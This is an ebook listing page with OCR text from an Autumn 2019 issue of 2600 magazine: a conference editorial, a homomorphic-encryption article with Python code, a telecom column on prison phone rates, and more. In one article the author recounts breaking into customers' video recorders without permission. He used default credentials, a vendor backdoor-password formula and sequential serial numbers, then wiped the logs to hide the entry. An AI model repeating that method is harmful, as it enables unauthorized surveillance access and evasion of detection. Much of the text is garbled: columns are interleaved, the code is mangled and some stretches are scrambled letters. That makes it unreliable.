ebook img

2600 The Hacker Quarterly - Volume 36 Issue 3 - Autumn 2019 PDF

35 Pages·2019·38.709 MB·English
Save to my drive
Quick download
Download
Most books are stored in the elastic cloud where traffic is expensive. For this reason, we have a limit on daily download.

Preview 2600 The Hacker Quarterly - Volume 36 Issue 3 - Autumn 2019

0 6 2 8 L 8 ° L 1 S 8 2 | Eurasian Payphones RISKS Our Audacity Fully Homomorphic Encryption and Privacy Who Is Watching Us? alii TELECOM INFORMER US) “ The Mysterieosf the Hidden Internet 15 Breaking DirecTV’s DVR Authentication 18 Machine Rhapsody in 2099 19 Introduction to Computer Viruses, Example in Windows Powershell 20 Turkey. No question about it - this is one weird All You’ Need is... Aix 25 payphone to walk towards in the city of Bodrum. HACKER PERSPECTIVE 26 ESL eo Comte ULE ee Ole) CM gC Oe TE Toam Le riteameee) M MT Teel] the phone itself is more than capable of handling any Belgrade, this basic card-only model is operated 1) Twitter the Enemy 29 dialing challenge you throw its way. Telekom Srbija. Photo by Cem “camelgun” Gunal Photo by Flipehan Student Privacy by Practice - Not by Policy 3 Online Thrift Stores Have Your Data 32 LETTERS 34 EFFECTING DIGITAL FREEDOM 46 Active Defenses for Industrial Espionage 47 The Infocalypse 50 Book Review: The Big Nine: Tech Titans and Their Thinking Machines Dk Book Review: A People’s History of Computing in the United States 51 CITIZEN ENGINEER 52 The Case Against Certified Ethical Hacking 54 Thoughts on Account Enumeration 55 Greece. An indisputably incredible sight to greet Arduino-Based Burglary Zone Input Tester 57 anyone who just happens to be looking for a 4 5 seer phone. These four card-only phones (one of which Turkey. OK, something very strange is happening “Information is Neutral” and Other Social Myths 60 is a different model) were seen around the central 19 ut Ona aT Me Istanbul and are HACKER HAPPENINGS ce 61 Poitier a nice companion to the bird model above. And we Wen em ore er MARKETPLACE 62 Photo by Sam Pursglove Bee pee Photo by Jon Pollack Got foreign payphone photos for us? Email them to [email protected]. MEETINGS 66 Use the highest quality settings on your digital camera! (Do not send us links as photos must be previously unpublished.) (More photos on inside back cover) —_- QUR AUDACITY ~ (Be ing right in the middle of midtown is when the next HOPE conference was) certainly had its advantages. But when we supposed to be held. By the time this were recently confronted with a tripling of issue comes out, we should have a good the price we were paying, we knew that idea one way or another what the future HOPE couldn’t remain there, at least not of HOPE will be. So we’re setting a date without fundamentally changing what of Monday, October 21st to share this HOPE was. We never wanted to price We’ve admittedly never known when mostly of people who already knew each information with the world. We will post ourselves out of the reach of many of our to quit. People have been advising us to other. And those were great and extremely an announcement at www.hope.net and attendees. Accessibility has always been since even before we got started. You may important in helping to construct what www.2600.com on that day. And while we one of our passions and losing that would be somewhat familiar with the thought followed. In fact, it was the cancellation can’t say for sure at this point whether this be a really bitter pill to swallow. process: play it safe, don’t make waves, of one of those intimate gatherings will be good or bad news, we can say that When we broke the news in late July, lead a comfortable and uneventful life. It (Summercon) in 1994 that led to the birth we expected to hear messages of support. we’ve got the very best people working just wasn’t for us - and, we know, not for of HOPE as a one-time replacement. But we were absolutely floored by the on this and that we have the support of so many of those reading this. From that point, the landscape started to amount. What’s more, we were unprepared many others around the world. And when We’ve faced all kinds of struggles change and big hacker conferences began at how many people wanted to support the you’ve got all that on your side, it’s very and challenges throughout our existence, to spread and thrive. Today, Defcon in Las conference regardless of where it was. hard for magic not to occur. many of which could have tipped the Vegas regularly gets over 20,000 people A significant number actually said they balance if we weren’t fairly stubborn and to show up, yet for the most part has we didn’t have support from so many in managed to stay true to the hacker spirit would prefer it if we weren’t located in : Sotwanteermsehnitp , remqauinraegde mebny t, 39 anUdS C ci3r6cu8l5a tiosnh owiofn g 26t0h0e:: the hacker world. The steady decline of that’s been there from the beginning. And Manhattan, where everything tends to be : Magazine, published quarterly (4 issues) for October : more expensive. All kinds of ideas have £1, 2019. Annual subscription price $29.00. : the print market, the loss of bookstores, HOPE made its own history, expanding distributors who disappeared with our the horizons of what constitutes hacking, been sent to us, including alternative : 1. Mailing address of known office of publication is money more times than we can count, bringing in speakers like Jello Biafra, venues, conference formats, and logistical : 2. MBaoix li7n5g2 , adMdirdedsls e ofI stlhaen d,h eaNdeqwu arYtoerkr s 11or9 53g.en eral and, of course, increased printing costs. Daniel Ellsberg, and the Yes Men to join ideas we had never even thought of before. business offices of the publisher is 2 Flowerfield, To even survive without the help of hacker legends like Steve Wozniak, Kevin In short, the hacker community helped to : 3. TSth. e Janmaemse, s NYa nd 11a7d8d0r.e sses of the publisher, editor, advertisers is a testament to the loyalty Mitnick, and Richard Stallman. Concepts rejuvenate our passion and motivated us and managing editor are: Publisher and Editor: and the strength of our readers. You make and goals like hacktivism, the Tor Project, to really spare no effort in figuring out ENemwm anYuorekl 1G1o9l5d3s.t eiMna,n aBgoixn g 99,E diMtoird:d leEr ic IsClaonrdl,e y, 2 the impossible happen - and have for hackerspaces, and SecureDrop all had how we could make this work. Flowerfield, St. James, NY 11780 some time. early audiences at HOPE conferences, It’s easy to forget sometimes, even =: 4. TNhYe 1o1w7n8e0r is Eric Corley, 2 Flowerfield, St. James, Then there’s HOPE. This unique and enthusiastic ones at that. In addition when you’re in the midst of it, how : 5. Known bondholders, mortgagees, and other project has brought together many to the tech, we mixed in discussions amazing things can continue to happen s1 ecpuerricteyn t hoolrd emros reo wnofi ntgot alo r amhooludnitn g ofm obroen dst,h an thousands from around the world for 12 of justice and empowerment. Over the when the right people are working mortgages, or other securities are: none. truly amazing conferences in New York. years, we’ve managed to give the stage with you. We’re used to being told that : 6. Extent and nature of circulation: We’ve seen it expand steadily over the to well over 1000 speakers. We saw the something is impossible - and then doing years, as we’ve seen the attendees and community grow, become more inclusive it anyway. That’s how we’ve felt about the hacker community grow, mature, and representative of gender, and open a all of our conferences so far, because 21 B.A. PTaido ta l a nN du/mobre rR eoqf uCeopsiteesC dir : and flourish. We don’t have the space to continuing dialogue on how to do better. everyone knew it simply wasn’t possible : RIenq-uCoeusntteyd SOubustcrsiipdtieo:n Mail Subscriptions 4481 0 4566o ¢ list the many uphill battles involved in Instead of running from the controversy, to pull something like that off. But we’ve 3 Saalnde s coTuhnrtoeurg hs alDeesa lers and carries, street vendors, 20283 19580 : organizing these things, but what we see we openly embraced it - and found that it never been particularly practical or big 1 C. 4T otOatlh ePra idC laasnsde/so r MaRielqeud esTtherdo ughC irtchuel atUioSnP S 02 4764 24146 0% after each event has always filled us with made us stronger. And the best part was fans of constricting rules and conformity. 1D. F1r eOeu tDsiistdrei-bCuotuinotny by Mail and Outside the Mail tremendous pride. that most of our attendees really seemed This annoys the hell out of some people, 23 OItnh-eCro uCnltays ses Mailed Through the USPS jl Hackers On Planet Earth started as yet to get that. but we’re fairly used to that reaction to another crazy idea of how a European- Of course, the apparent loss of our most of the things we do. Plus, it’s always 2 G. Copies not distributed 1H. Total style gathering of hackers should also hotel has really thrown a wrench into good to be annoying the right people. 2 |. Percent Paid be able to happen in the States. Before things. From the beginning, all but one As we go to press, we’re not yet at : 7. | certify that the statements made by me above are : our first conference, the largest hacker of the HOPE conferences has been held the stage where we know what’s going correct and complete. 3 g et-togethers were just that: get-togethers at the Hotel Pennsylvania in Manhattan to happen in the summer of 2020, which (Signed) Eric Corley, Owner. Page 4 2600 Magazine \ A 2019 (a nd Alice and Bob would have to duke it out rega rding who should lift the skirt. Typical solutions) to the dilemma involve lawyers and NDAs. Moments before he took his last breath, Alice’s grandfather gave her three top secret numbers that will lead to the map coordinates of the spot where his treasure is hidden. To get the real coordinates, Alice must add two of the numbers and multiply the third by a constant. Alas, while cryptographically savvy, Alice is arithmetically challenged and has to enlist outside help. Fortunately, Bob runs a service that can add and multiply encrypted numbers. Alice agrees to send Bob her FHE encrypted numbers. Bob will then perform the calculations on the two numbers without ever seeing them in plaintext. Calculations completed, Bob returns the encrypted results to Alice without ever seeing the plaintext results. When Alice gets the results, she can simply decrypt them to get the coordinates. We are implementing this interaction in Python - see the listing for fullyhomo.py that follows this article. The code was written for Python 3, but should work fine with Python 2 as well. It will run on Ubuntu Linux using any one of the following three commands: by Thor Mirchandani ./fullhomo.py python3 fullhomo.py python fullhomo.py In the modern world, people are becoming more and more dependent on using other people’s Similar commands are available on Windows. Here is a typical output from running the computers for their storage and computing needs. Cloud technologies, phone apps, and Software program: as a Service (SaaS) are just a few examples of applications that rely on other people’s machines. ~/projects/homomorphic$ ./fullyhomo.py Most people understand the absolute necessity for securing their data in the Cloud and rely on SaaS Example: using some form of encryption. Unfortunately, encrypting data in transit or on a cloud disk using Alice wants to use Bob’s calculation service to calculate 5 + 10 She encrypts 5 most of the common encryption algorithms is not sufficient to ensure privacy. ...and the encrypted value is 408231311223330758911876050904... When you browse, view, or manipulate the data, it is decrypted to plain text and becomes She then encrypts 10 visible to a sufficiently privileged software program. Can you really know for sure who else is ...and the encypted value is 6811593647043826157618544194678... using your cloud instance? Even on a hardened system, data can be read directly from CPU registers and data buses by a Alice also wants to to multiply 6 with the constant 3 She encrypts 6 mBoutninviaet edH uaanttga ckhearc. keIdf thtahte sXobuonxd!s fFoarr -fmeotrcehe d,f ritvhoisl ouiss exeaxcatmlpyl ehso, w cohnasriddwearr et heh actekcehrn iceaxlt rauonrddeirnpaiinr-e ...and the encrypted value is 275872367736262799842862895600... nings of Kraftwerk’s 1981 song “Pocket Calculator.” If individuals can do it, what are the capa- Then Alice sends the encrypted values to Bob along with her public bilities of more well-funded organizations? = key Fully Homomorphic Encryption Bob adds the two encrypted values without knowing what they are the encrypted result is 3509690235178988491246734744677382694... The bottom line is that to be usable, information encrypted with traditional methods has to be Bob multiplies the third encrypted value with the constant visible in plain text at some point, if only for a brief moment. Another way to look at it is that a the encrypted result is 8919545079897387397953169089569936011... man-in-the-middle attack is always possible and as long as the attacker is creative when it comes to defining where the “middle” is! Bob sends the encrypted results back to Alice Does it have to be that way? What if we could reliably manipulate encrypted information Alice uses her private key to view the plain text results: Addition: 15 without ever decrypting it? Turns out that we can. Enter Fully Homomorphic Encryption (FHE). Multiplication: 18 FHE is a class of ciphers that have the interesting quality that an arbitrary computation on ciphertexts generates an encrypted result which, when decrypted, matches what you would see Armed with the coordinates, Alice packs her shovel and books a trip to Niger. Or did he mean had the same computations been performed on the plaintext. Sounds like black magic, doesn’t it? Mauritania? Or maybe Namibia? Surely the treasure isn’t in the middle of the Atlantic?!?! East Theoretical FHE systems were postulated in the late 1970s. In the following decades, versus West, North versus South, these things do matter! researchers implemented systems that permitted a limited number and limited types of computa- tions. Then in 2009, Craig Gentry described a system that could perform any computation, albeit The Code very slowly. Basic computations would take hours! But it didn’t take long for Gentry and other The Python code implements an FHE algorithm called the Paillier cryptosystem. To keep researchers to come up with implementations many orders of magnitude faster. Those systems are things brief and simple, the code only implements the operations required to for the addition and finding practical uses today. (Crypto Trivia: Craig Gentry received a MacArthur Genius Award multiplication operations. Also, the key pair is hard coded for the sake of simplicity. A full fledged for his work on encryption.) implementation would provide code to generate random keys. The class FullyHomoCipher on line 14 is the Paillier encryption code. The class BobsCalcula- A Practical SaaS Example tionService on line 54 defines the operations for addition and multiplication of Paillier-encrypted One application for FHE is SaaS. Alice might have valuable data and Bob might have a valu- values. able algorithm. Neither wants to reveal their “secret sauce” to the other. With traditional encryp- Our treasure hunt adventure starts on line 75 and uses the two classes described above. tion methods, this would not be possible: The algorithm would have to operate on plaintext data, } ie extensively commented in order to make it easy for the interested reader to modify a) Page 6 2600 Magazin e Autumn 2019 Page 7 (ex periment. \ (— def encrypt_message(self, pub, m): > A note of cauti. on for readers that aren’t familsipea r wit. h the Python language: Unlike e most f i i == e. ee. 7 er pup-non) languages, Python is white-space sensitive, and indentation matters. It’s importantto preserve the a = (m-r) % pub.n indentation or the program will not execute properly. selt.a= 2 self.b=b FHE Now and Tomorrow def decrypt_message(self, priv, pub): Our SaaS example is obviously a toy, but that’s to be expected from about 140 lines of pe Oe eee ee ae commented Python code. More robust, fully featured FHEs built around stronger algorithms are POTuEn Ye finding new applications every day. ; # Bob's encrypted calculation service Software as a Service is only one application that’s a good match for FHE. Other types of class BobsCalculationService(() i applications include smart contracts, block chain systems, data mining, “vanity” hash d- x pod two) enerypted numbers a y , ining, “vanity” hashes, en def encrypted_add(self, pub, a, b): to-end encrypted database queries, anonymous identity systems, data integrity verification, and return a * b % pub.n2 so on. With the rapid development in the field, we can expect many other uses in the very near future def sum (self, cl, c2, pub): FHE. is currently deployed across several i. ndustries and problem domains, including elec- j ba == s(ecll.fa. en+ crcy2p.at)e d_%a dpdu(bp.unb , cl.b, c2.b) tronic voting systems, genomics, and payment systems, and we predict widespread adoption in j c = FullyHomoCipher(a, b) areas such as health care, smart power grids, and finance to take place very soon. return © 4 # Multiply two encrypted numbers with a constant (Bob) #!/usr/bin/env python3 def encrypted_mult(self, pub, a, n): import random return FullyHomoCipher(-1,-1).expCalc(a, n, pub.n2) # Alice's Private/Public key pair, hard coded for simplicity class PrilvaatmebKdeAy=(7)3:8 42165240981452554 90569959044 95420889617570042898731779798340789 def produca t(= sel(cfl,. a c*o nscto,n st)c l, % ppuubb).:n 05122488912 b = self.encrypted_m(uplutb, cl.b, const) mu=1462386606792416204975818590091246298598290203721449108746825548815542 c¢ = FullyHomoCipher (a,b) 7133263 return c class PublicKey(): # THE SAAS EXAMPLE BEGINS HERE n=73842165240981452554 90569959044 9542089513117936657660262085094366199671 if mame == '_ main_': 389241 a #A lice's Key Pair © 65945716n326=45144562967655931677548796740029848231301730206976099302466639304891576520997861456532522507358854848772534675248792763019836483505953504525 ppurbi=vP=uPbrliivcakteeyK ey 6081 9=73842165240981452554905699590449542089513117936657660262085094 366199671 # The top secret numbers Alice wants to use 389242 secretNumber1=5 secretNumber2=10 # Alice's Implementation of a fully homomorphic Paillier cipher secretNumber3=6 class FullyHomoCiphe()r: const=3 def _init_ (self, al, bl): self.a = al # The Cipher objects Alice uses for encryption self.b = bl alicel = FullyHomoCipher (-1,-1) alice2 = FullyHomoCipher(-1,-1) def expCalc(self, base,exponent,modulus): alice3 = FullyHomoCipher (-1,-1) result = 1 while exponent > 0: # Alice performs encryption if exponent & 1 == 1: print ("SaaS Example:") result = (result * base) % modulus print ("Alice wants to use Bob's calculation service to calculate ", exponent = exponent >> 1 »secretNumberl,"+",secretNumber2) base = (base * base) % modulus print ("She encrypts ", secretNumber1) return result alicel.encrypt_message(pub, secretNumber1) print ("...and the encrypted value is ",alicel.a,alicel.b) def encrypt (self, pub, plain): print ("She then encrypts ",secretNumber2) while True: alice2.encrypt_message (pub, secretNumber2) xr = random.getrandb(i1t2s8) print ("...and the encypted value is ",alice2.a,alice2.b) if r > 0 and r < pub.n: print ("") break print ("Alice also wants to to multiply ",secretNumber3," with the x = self.expCalc(r, pub.n, pub.n2) ™ constant ",const) cipher = (self.expCalc(pub.g, plain, pub.n2) * x) % pub.n2 print ("She encrypts ", secretNumber3) return cipher alice3.en c rypt_message(pub, secretNumber3) print ("...and the encrypted value is ",alice3.a,alice3.b) def decrypt(self, priv, pub, cipher): print ) ; x = self.expCalc(cipher, priv.lambdA, pub.n2) - 1 ; prént ("Then Alice sends the encrypted values to Bob along with her plain = ((x // pub.n) * priv.mu) % pub.n ; public key") return plain print ("") page 8 2600 Magazine 7 \ Autumn 2019 Page 9 7 o e# ncThrels_ea =aalrie cetlh.ea encrypted values Alice sends to Bob Da encrl_b=alicel.b encr2_a=alic 2.a encr2_b=al b encr3_a=al 3.a encr3_b=alice3.b # Bob's Cipher objects, initialized with Alice's encrypted numbers Since Bob doesn't have the private key he can't decrypt the numbers bob1 = FullyHomoCipher (encrl1_a,encrl_b) bob2 = FullyHomoCipher (encr2_a,encr2_b) bob3 = FullyHomoCipher (encr3_a,encr3_b) # Addition print ("Bob adds the two encrypted values without knowing what they are") result1l=BobsCalculationService().sum(bobl, bob2, pub) pri n t ("the encrypted result is ",r esultl.a,result1.b) # Multiplication with a constant print ("Bob multiplies the third encrypted value with the constant") result2=BobsCalculationService().product (const, bob3, pub) print ("the encrypted result is ",result2.a,result2.b) print ("") by Ray Keck to me about once a year when we would go print ("Bob sends the encrypted results back to Alice") through a flood of calls regarding hacked print ("Alice us es her private key to view the plain text results:") I have always taken an interest in hacking/ machines and user accounts. The reason these pprriinntt ((""AMdudlittiipolni:c ati"o,nr:e sul"t,lr.edseuclrty2p.td_emcersyspatg_em e(spsraigv,e (prpiuvb,)) pub)) phreaking, but never applied anything I have machines would get hacked so frequently Uoes the relea se of a new learned (for either good or evil purposes)... was because of vulnerabilities found in the until recently, that is. A couple years ago I firmware. started working for a manufacturer who sold This, of course, isn’t anything new to home security equipment (network video technology. It has always been a cat and issue always seem to catch recorders, IP cameras, etc.). I have had some mouse game between hackers and firmware experience with older analog systems in the developers since the dawn of time. Take, for you by surprise’? past, but this would be my first foray into example, the Xbox 360 when hackers modified the IP based world. I was one of three people DVD-ROM firmware to play game backups working in tech support helping installers and, on their machines. Microsoft threw everything on occasion, end users with technical issues. It they could at people modifying their consoles wasn’t the greatest work to be doing (as tech to thwart these attempts. But what resulted support typically isn’t), but it was a decent was a back and forth game between both paycheck and close to home. parties involved, with Microsoft continuously During my time of employment with the patching, updating, and swapping hardware. company, I had a lot of time to think about and The difference here is that the cheap Chinese evaluate the security of the equipment we were manufacturer put forth much less of an effort selling. We billed ourselves as a manufacturer to secure their products. to the customer, but this wasn’t exactly true. The truth was that we purchased hardware For years they used very simple algorithms from a Chinese manufacturer and rebranded to generate backdoor passwords with informa- it with our own logo. We also customized the tion that was widely available on the Internet Why not avoid the chaos and subscribe? firmware that was being flashed to the equip- to those who were interested. The backdoors were intended for people who forgot their ment. This information wasn’t publicized, and Still only $29 a year in the States and Canada, $41 elsewhere. we made it a point not to talk about it with passwords. But rather than give them a way to clients, even if they had brought it up them- do it on their own (like a password reset link Send check or money order in US funds to 2600, PO Box 752, selves. Sounds like a great business to work on the web interface landing page), all they for, huh? had to do was call us. The backdoor codes Middle Island, NY 11953 USA or visit our store at store.2600.com! Right off the bat, this job had already felt were generated something like this: 8888 x suspect to me. While shady business practices day x month x year, the last six digits were the do not necessarily translate to bad product, it password. We only generated those backdoor And check out our new store guide at www.2600.com so you can was the cheaply manufactured Chinese hard- passwords for installers and law enforcement, always know where the nearest copy of 2600 is! ware (or rather the embedded software) that which was supposed to curb them from falling was the issue. This was particularly evident into the wrong hands. Ss Page 10 2600 Magazine 7 A 2019 Page us (— This was a fine idea in the beginning, but and didn’t work through the web interface.) ended up being half-baked in the end. This was so all logins that I performed were using the because we had no way to verify the identity client software (yet another vulnerability). of the person calling. Anyone could call in I found that after several attempts on 30 and say that I am “Mr SoAndSo” with “Fake- different machines, I was able to success- Company” and tell us “I need a backdoor for fully get into six of them. This is definitely a Serial Number xxxxx” and they would have high enough number to raise some concern to no trouble getting it. This, of course, has since management (or so I thought). I cleared the been patched with stronger algorithms to keep event logs on the systems before exiting so people from generating their own passwords. that any evidence of my entry was removed. But people calling in to get passwords still White hatters will sometimes change the Hello, and greetings from the Central Office! meaning we can undercut CLECs wholesale (get remained an issue, Oftentimes when companies OSD (on screen display) to display something It’s moving day, by which I mean another filthy it?). They aren’t entitled to share these networks install security equipment, they leave default like “HACKED” so that the user is aware of CLEC, hanging on by its fingernails for years, has (thanks, FCC!) and they aren’t tariffed so they settings on them. Way too many calls started what happened without ever taking complete finally gone out of business and is moving their can’t receive a discount. In fact, they don’t have out with “I can’t get into my NVR anymore control. It also serves as a warning of potential junky old equipment out. Of course, we were kind access to these services from us at all. So, as using the credentials of admin:admin.” Is this danger if the problem is left ignored. enough to provide their customers with uninter- more and more telephony has moved to VoIP aBnu t enwdh enus eri nsptralolbelres m?l ackS ureth e it teisc,h ntioc aaln kenxtoewnlt-. acceIsns thteo ortyh,e seI prmoabcahbilnye sc ouflord mhoanvet hsm,a inotr aienveedn rNuapttuerda llys,e rvwiec’er e bcyh artgaiknign g thoevme r fullt hepirri cea cacso uwnetlsl., hanadv e isf ocuanrdr iedit hoavredre r braonda dbhaanrdde r netot wcorokmsp,e teC.L EACnsd stateptsotechhda ieetelgt lrsusec eOea ihh wlnfoeIle tedwi moyrs c aeoac mdfuwcmhoaliuatyirydssur eni a.m enl wcIhgl saaoo yO rfwc mn daekwepess aef en at raian unedpcutyl tepuonht flr e deoii suceheopttoreduoa mlq swsey ut swti hiiowoena ptffrosg h mletrt i ehdtmhneosi-ts emtsh y.sm em h uosao ereuct wI ph hf heohwi amrepand amrrsnneecfaoe’t.suhnpc ten ueiy drrn tialhehtnayasoytdd,tfo oeittayt foisahe ossoa“nuisrtl pelhAese yref a otwvtoeaeihmihffrts i aa tgccI t hbohhoerutwfiiwori lenna -ndrgescug ses hopi .absnn veb,gaci eel en ioTdpcninmhottl geiyni”t sw ehn ea.e awscd na ooodpnmnr pfltcakolyre cenu orhfeddanfiv ocessen deh re or snsvtoo.o .eaf t fdgo t aMaBhiayeuussn at t hs o aao -tlswItou sku goepgcn rndghtotha eoiiwotnssontweo-enof oCerwtwulsnavhehhL tvaeieaeeEnn sctld O .C hho u w efrwhroiT hfaix -(ht eet)wse.dt su ht shcuhoetehTrelprhd yhpreeve ier isrsia cacsCcsute leoisLhsCeneunoe E LtngypaC ltEerwgoy r aCeu edat r o etwv so-aa rdprssti iisitr hs woes oe isscicvact erfohil ihrcuadwlvehndetraoia ht egycwyp ip esonenesr o roC ,gnnf L fdrtb EiheriitbennlCeosh ielpugpesrihar om sn ai n.gorls o mfrauiwr eepbeosng or le,u onre flb cv haaaiatsascttvfeeneehhoeddds,eer Cawasimf taoenhy rlccl o tluoa rterSmr upriplcyh tyopee oy fira!n Icak apeDktap is srehtn tdoir,gns nou uenmpbtt obhohlafmeeot rcitrc’eahc.kstl,e ae al rsldj i. aIu pfns ffhmtdrer oua Fdtosnfe emtefidso n .erre ra btaaT feeslb hrs ofe,eoet mc mhdpea eerIF ur’iesavsonllreeonuo e lnnmays sbbpi tore einiesprcm ,snehseo c ra nausr srngoghrsewneeelt h antettijhlertlneoalhefygbsyet estwwuwwitsseiqahh i ctlruiiltthe hccihe aahhdpmtv. m faa eo e nmrffnA yeuifthn rtaera ythanmdehtow msseuinaa esrrt er c ehte h epdh iciraeretnfocv u maaebipmmleoascdliannbe aellctlsdtiyh sys ea i irsitns p t Petaei2nhwnaoswoPegripa t e tlr heuefi a (naap v ocpdramtwpat itohlhthledioaetap teed hbe dar.lewt hneir ta l -hmTvdtetaph eyohsune e-ebu urpclceanecuia flperoclirlrillmraoy)tyemer-.,y,d-e dsmtarUifsalehi aipticesrcdetsura.ytmhareIi b nliw till tLaisn iayirnceernt.eeelggtes a ol m sesMtye iPohas dnnio2hkg nPtafe,ogs t i ts l hhri aabekIcmtsr r et euwhje h ruaafaaaeslttrknany to le, gy lo , t ce hi awbdaennrmua,ttfi t uon fs kcetby ceachetotl tnhd uhioiidder nssv os tvieenrteo ne okeovlg qiu ew vmnubenaedalti mdyo ce p ps htmosp hoifioe etasn or ctnst etouhtfm sisiriu, izs.ebn n ne ecciies dot tmfarihaa yptoaell honnssua.-d-eopti t tbwnpssaCp uotueauaLatasryypd lErieiielptCn nynpouve ,oggpesess rexsirypdt eb thue, shsuor ;eusgmw tilioor ettbn oodieve feaded etlbs l riotsb.lh,wpeel iea s a nsti. y r Osi caoopvn woIulatcegs hrdpytur ort,i s uonjstrutgpeosjntrt rrtusomiav so mectiober etcau,ol eenru ewdsto lme fout.rtahbg ie wtenilhhn liesiol ’t gsfsTth oC ,ht totLoihimui assvEwtaa t eh,pt rCnr aiigo yycocitpu ,on hnan l.r abgdl atlieeo eti reoccTcgv dtauihoei aslmetonnnnahey’d-gdaret t odTmmpsawnreeroiihe eilmnne ns*uuirc IoLttaennrn ceei aoaet ntuc2rurktek 0aafs f il1totoienlr3arhds (ygn e,e a l klocajoFcctada onhaoCnfiogel n lCG w s-TpneiFcrdra.LxadCiine cl)essdClge rot su Te.nealpd wsandr aw nco Tiadet hs$s s e/1eoi odnspnScw recaemp iel cepasl rruhsfkoa aro,onrtitr ueh enm n se ieag .jn pnr a ouadhif1mtlt o T9gseaen9 hsor.s2 e0eoik1 sa x sdew ,ne ted p:c c repebncornuhpGttvtooarsl sigvmi o dresptbeenohappars’neee-lssstyrr This allows people with little or no networking behind a firewall. And finally, check event logs state tariffs, we had to continue providing them nies make the slimiest COCOT provider look knowledge to set up their equipment for remote often. Most hackers don’t bother to clear them service, but not enough to ever have a profitable legitimate. Many telecommunications contracts access by scanning a 2D barcode or inputting when they are finished with their dirty work. A business or ever fix anything that was wrong with negotiated by these providers offered a revenue the serial number into some software so that lot of home routers keep records of this kind of their network. share with jails and prisons (yes, including they can view their cameras remotely. Fortu- activity as well. If you absolutely have to keep Over the years, we have managed to move privately operated, for-profit prisons). This nately for me, the serial numbers were created ports open, avoid using port 80 for http traffic many of our services out of the “regulated” side created an incentive for prison phone compa- sequentially, which made it easy to find poten- and don’t use default TCP settings. Also, vari- of the house to the “unregulated” side. Essentially, nies to charge high fees and per-minute pricing tial targets by running through them in order. ants of port 80 are bad (8080, 8000, etc.) and any modern broadband, or service delivered via and imposed - in effect - a tax on the families of I started with a known serial number and shouldn’t be used either. Keep in mind that the modern broadband network, is unregulated inmates. incremented it by one every time I made http ports aren’t usually required for viewing, which means that we aren’t required to file rates, Bowing to political pressure in 2013, after a a login attempt. The admin account on the but for remote management purposes only. comply with tariffs, or provide services anywhere series of proposed rulemakings, the FCC initially machines cannot be deleted (another vulner- When a security company can’t seem to that isn’t convenient for us to do so (sorry, but capped rates on interstate calls at 21 cents per ability), so that all I had to worry about was get “security” right, it makes you question you won’t be getting 100Mbps Internet at your minute for prepaid calls, and 25 cents per minute getting the password correct. I started by how secure anything really is. But what makes trailer a few miles outside of Tenino - we’ll sell for collect calls. In 2015, prison phone providers trying the default password of “admin” first. this so significant is that it is an invasion of you a POTS line and you can try dial-up instead). were further restricted to maximum charges on If I couldn’t get in this way, I would then try privacy, a scary reality of the modern world, Additionally, depending upon the state, tradi- the following ancillary fees: generating a backdoor. The backdoor pass- and it has to make one ponder the question: tional wireline services bundled with modern ¢ Taxes and regulatory fees: Actual tax rate aad were supposed to be local access only, ”Who is watching us?” broadband services are also often unregulated, with no markup Page 12 2600 Magazine 7 A 2019 Page 13 7 a ¢ Automated payment fees (via phone system, payments via Western Union, MoneyGram, etc.) i THE AVOTERI ED OF THE website, or kiosk): $3.00 The payment providers charge a higher fee than ¢ Live agent fee (wherein a live agent processes normal for payments to prison phone accounts, so MODE MF ERNET a payment): $5.95 they can rebate a portion of the fee to the prison ¢ Paper bill/statement fee: $2.00 phone provider. Additionally, some prison phone ¢ Third-party financial transaction fee (such as providers have invented additional services Western Union): Pass-through at actual cost. such as voicemail, for which they charge extra, by Tim Tepatti kitchen. There are no types of food from the creaTtihneg FpCrCe paiadl so acicmopuonstes.d Isno meo rderru les to araovuonidd cuanlrleignug la(twehdi crha tesh.a s Firneaplllya,c eds erviinc-epse rssounc h viass itvaitdieoon tim @tepatti.com owner’s country, and there are no recipes that game playing to generate excessive payment at many facilities) cost whatever prison phone have been passed down for generations. And fees, prison phone providers weren’t allowed to providers want to charge. The Internet today feels very open and let’s not forget the reason McDonald’s is like impose a prepaid account maximum below $50. Kickbacks are rife in the industry, despite the accessible. But the Internet seems to have lost that: they’re trying to make a profit. They’re In 2015, the FCC also set lower maximum obvious conflict of interest. The Prison Policy its mystery and charm. Before, you never knew not expanding due to their love of food and rates: Initiative discovered some common patterns of what you would run into - you could search a need to share it with the world; McDonald’s ¢ State or federal prisons: 11 cents/minute kickbacks: new term and find a fan site completely dedi- is expanding and opening new stores because ¢ Jails with 1,000 or more inmates: 14 cents/ * Paying the facility a “signing bonus” for the cated to the topic. Search “canadian owls” people think “I bet people in this area would minute contract. and you might find a website created by a buy McDonald’s - I think I could make money ¢ Jails with 350-999 inmates: 16 cents/minute ¢ Paying annual or monthly “administrative researcher, someone who had spent years of by owning a franchise here.” * Jails of up to 349 inmates: 22 cents/minute fees.” their life perfecting their research and knowl- Let’s switch back to websites. Many of The prison phone providers immediately Providing phone-related technology, like cell- edge, someone who had spent hours and them aren’t driven by a love for what they do; sued, and the court granted a stay of the new rates phone jamming equipment or call recording hours creating this Internet-accessible portal they’re driven by a love for profits. Perhaps going into effect. Accordingly, rates were frozen equipment. into their depth of knowledge. But today, that owls weren’t the best example - let’s do the at the 2013 interstate rates. Providing computer equipment for correc- feeling and mystery is almost completely gone. total opposite and look at some anime. If you In 2016, the FCC adjusted its proposed Google search for Sailor Moon, an extremely tions staff, law libraries, and religious Search “canadian owls” and what are you maximum interstate rates, in an attempt to moot services. greeted with? Many large websites operated by well-known anime from the past decade, the earlier litigation: you'll get a lot of search results. Wikipedia, Paying exorbitant “rent” for the vendor’s foundations and companies. Sure, they have e2apfgr0¢¢¢¢f a o1eiv3cnTit JJJmS h.adaati ieiieianlllg ntrsssAurtes tcae recnwowosef toiari tfter gtafhdudahotf p iiree t nnd3 a gte 15rorl, a0siay0t-tl3med0,a9 4sim0 y.99d e p n9drr’ ooaiitirftsa n eiotmsnntm aemshotle:awrer ytoesee r:nm s1k ea3:s. wi iu 3 nnec12 edme1r,adn ac tP tteercseansisfe/n:ts rnmd osoti ng/zsn ome/t1uini9hmtn en° ie gunp catctuhe eotnoiu tenntrsht et/eo tftcpiahhafnahealfvom tlie neplInnseeiant a a qwiitmuegenoepridgnur a ept od movdaeriinmodngdtcefooaeith wunrona nsnairp. ttzoagtf lia i eiotnetAanis goitn sfoo cc d ano ltsrm hc raoatnoethnnhafm cidtaeastm uv,vyiii reoon asr nvdl)saoolb psillyneru o,vaeesh entnvpaf sijiaivao coecimianu lilalsssoi md( ltubowyeysea.sh len ttiydno bc c yho l eppclxrpoateairluihccsiigmattoschevelnoetdedysn- etettwianoimhinenn oeatdvfcnrhi ecoyse lror c’p nmslat 